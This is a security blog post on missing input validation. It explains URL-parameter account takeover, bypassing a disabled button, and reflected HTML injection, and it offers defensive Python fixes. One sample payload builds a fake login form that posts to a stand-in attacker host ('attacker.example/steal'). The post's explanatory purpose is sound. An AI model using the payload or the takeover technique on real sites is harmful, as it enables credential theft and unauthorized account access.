This post is about something very common among web applications: user input validation. I’ve assessed a ton of web applications that rely on trusting the good behavior of users, hoping they respect, or at least don’t discover, what their current user profile is actually allowed to do. This is a bad development practice, and it leads us to the root cause of the problem: the lack of user input validation (checking every command a user sends to the application), combined with simply “hiding” the menus a user is not supposed to access (hidden links).
It is pretty common for developers to build their application with just a single authorization step: once you’ve passed the login screen, the application assumes that anything the user does beyond that point is an authorized action, and no further profile or credential check is necessary. This usually comes together with “menu hiding”, where the functions the user is not supposed to access are simply marked with a “hidden” attribute.
To illustrate this, I’ll show a practical example: an application that I assessed in the past.
The image above is the web app, pretty simple and straightforward; it was developed to register tickets and services. The highlighted text is the name of the logged-in user. This is already a bad practice in itself, since it is sensitive information that could easily be captured or stored in the browsing history. The example is really simple: all we need to exploit this vulnerability is to know another valid username and change it in the URL itself. This URL is something the regular user is never supposed to see; the web app uses redirects and URL rewrites to obfuscate it, but it comes to light when you use a web debugging tool.
Here’s the view from the web debugging tool, which shows the full URL. We just have to change the username and see if the application accepts the new input without validating it.
And there we go: the application simply assumed that the user “alexb” made the request, since his username was supplied in the previous request. This allowed me to log into another user’s account without knowing its password. This kind of problem can be remediated by performing a credential check on every request the application handles, or by implementing session handling that confirms the currently logged-in user has sufficient permissions to execute each command.
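To make the fix concrete, here is a minimal sketch of that per-request check in Python. All the names and data here (`SESSIONS`, `TICKETS`, the ticket ids) are hypothetical, invented for illustration; the point is that the acting user is derived from the server-side session, never from a client-supplied parameter like the username in the URL.

```python
# Hypothetical example data: session token -> authenticated user,
# and ticket id -> owning user.
SESSIONS = {"token-123": "alexb"}
TICKETS = {"T-1": "alexb", "T-2": "maryk"}


def get_ticket(session_token: str, ticket_id: str) -> str:
    """Return a ticket only if the session's user actually owns it."""
    # Identity comes from the server-side session, not from the URL.
    user = SESSIONS.get(session_token)
    if user is None:
        raise PermissionError("not authenticated")
    # Authorization is re-checked on every request, not just at login.
    if TICKETS.get(ticket_id) != user:
        raise PermissionError("not authorized for this ticket")
    return f"ticket {ticket_id} for {user}"
```

With this in place, changing a username in the URL accomplishes nothing: the request is still evaluated against the identity stored in the session.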
Another easy-to-exploit example can be seen below:
In the above image, I’m highlighting a button that was disabled, probably because the function was already developed but not yet in production, so the developer decided to just disable the button and leave the function working in the background until it reached production. By checking the source code of the web app, we can see that the button is merely disabled. If you are wondering what would happen if we just enabled and clicked the button, here it is:
By enabling the button and clicking it, I got into the disabled portion of the web app. Although this may seem trivial, it is a real-world example of how some web applications are developed, and it applies to many other kinds of attacks that share the same root cause: bad development practice and trusting the good will of the user.
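The lesson is that unreleased features must be gated on the server, not by a disabled button in the HTML. A hypothetical sketch of that server-side gate (the feature names and `ENABLED_FEATURES` set are invented for illustration):

```python
# Features the server currently allows; anything else is rejected,
# no matter what the client-side UI shows or hides.
ENABLED_FEATURES = {"tickets", "services"}  # "reports" not yet released


def handle_action(action: str) -> str:
    """Execute an action only if the feature is enabled server-side."""
    if action not in ENABLED_FEATURES:
        # Reached even if a user re-enabled a disabled button
        # in the browser and submitted the request anyway.
        raise PermissionError(f"feature '{action}' is not available")
    return f"executing {action}"
```

A user who flips the `disabled` attribute and clicks the button still hits this check, so the hidden functionality stays unreachable.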
To finish this post, I’ll show you how some types of HTML injection and XSS (Cross-Site Scripting) attacks work. OWASP states that:
“Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.”
In other words, XSS happens when you send a command to the web application so that it “renders” or processes it and shows the result back to you. This is widely used to trick users into believing they are accessing a trustworthy site when, in reality, they are looking at a malicious copy of the original, designed to steal information.
The above image is the example. The red rectangle shows the vulnerable parameter; this relates back to the point I made earlier about the lack of user input validation. The attack is possible because this parameter echoes back to the user something he sent to the web app, without checking whether it contains anything malicious.
The orange rectangle is the malicious command I sent: a set of HTML instructions that builds a username and password form (blue rectangle). The idea is to convince the legitimate user to send his credentials to me (the attacker). Since he is still on the trustworthy web site, the form looks perfectly secure and legitimate.
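The standard defense against this reflected injection is to encode user input before echoing it into the page. A minimal sketch, assuming a Python backend and using the standard library’s `html.escape` (the `render_message` function and the payload are hypothetical, for illustration only):

```python
import html


def render_message(user_input: str) -> str:
    """Echo user input into an HTML page safely."""
    # Escaping converts markup characters (<, >, ", &) into entities,
    # so injected HTML is displayed as plain text instead of being
    # rendered by the browser.
    return f"<p>Your search: {html.escape(user_input)}</p>"


# The kind of payload described above: HTML that builds a fake login form.
payload = '<form action="https://attacker.example/steal">login</form>'
safe_page = render_message(payload)
```

Because the `<form>` markup is escaped to entities like `&lt;form&gt;`, the victim sees the attacker’s text on screen rather than a working login form.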
Cross-site scripting attacks are really hard to avoid and can be found on many sites around the web, but there are a few things you can do to mitigate them. The main objective is to filter user input down to something the application can trust and is expected to receive. I strongly recommend checking out the OWASP guide on preventing XSS attacks, which can be found here:
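That filtering works best as an allowlist: accept only the exact shape of input the application expects and reject everything else. A hypothetical sketch, assuming the ticket-id format `T-` followed by digits (the pattern and function name are invented for illustration):

```python
import re

# Allowlist pattern: only ticket ids like "T-1234" are acceptable.
TICKET_ID = re.compile(r"T-\d{1,6}")


def validate_ticket_id(value: str) -> str:
    """Return the value if it matches the expected format, else reject it."""
    # fullmatch requires the entire string to match, so trailing
    # injected content (HTML, script, SQL fragments) is rejected too.
    if not TICKET_ID.fullmatch(value):
        raise ValueError("invalid ticket id")
    return value
```

Validation like this complements output encoding; validate on the way in, encode on the way out.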